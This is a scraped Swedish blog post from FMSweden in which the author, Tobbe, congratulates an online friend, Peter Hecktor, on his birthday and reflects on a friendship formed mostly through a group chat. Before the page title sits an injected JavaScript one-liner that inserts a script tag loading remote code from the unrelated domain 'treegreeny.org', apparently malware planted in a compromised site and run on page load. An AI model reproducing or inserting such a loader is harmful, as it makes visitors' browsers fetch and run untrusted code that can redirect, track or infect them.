;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Happy Birthday!! – FMSweden
Meny Stäng

Happy Birthday!!

Det var en gång en telefontråd som skapades, fyra personer blev inblandade. Till en början var det stelt, eller nej egentligen inte, men till en början var vi bekanta.

Det finns människor man inte riktigt klickar med, det finns helt enkelt ingen kemi. Man pratar och försöker ha ett vettigt samtal, men det blir aldrig riktigt naturligt.

Sen finns det tvärtom, personer man klickar med direkt. Man pratar om det mesta, man skriver saker och diskuterar saker på en nivå, som man kanske inte riktigt gör med vem som helst.

Ofta är detta ens bästa polare, det är personer man har riktigt nära sig själv i sin vänskapskrets. Eller så är det Peter Hecktor, som jag träffat en gång. På Kamratgården. Då försökte jag skjuta en boll i hövvet på honom för att han håller på Arsenal…förlåt Tottenham.

Idag är det din dag Hecktor, du har renoverat och stökat hemma, för att det är typ den Peter jag “känner”. Alltid plikten före nöjen. Först var det fotbollen, sen blev det musiken och nu är det huset och familjen.

Vi känner inte varandra egentligen, det är bisarrt att säga att vi är bra polare när man aldrig träffats på riktigt, men vem bestämmer vem som är polare eller inte?

Denna AW:n blir lite annorlunda, men det är för att vänskapen vi har är annorlunda.

Hoppas du har haft en fantastisk dag!!

Jag är glad att vi är polare

Grattis Hecktor på födelsedagen

Ha en grym helg vänner

SKÅL

Tobbe

Please wait...

Liknande Inlägg

3 kommentarer

Lämna ett svar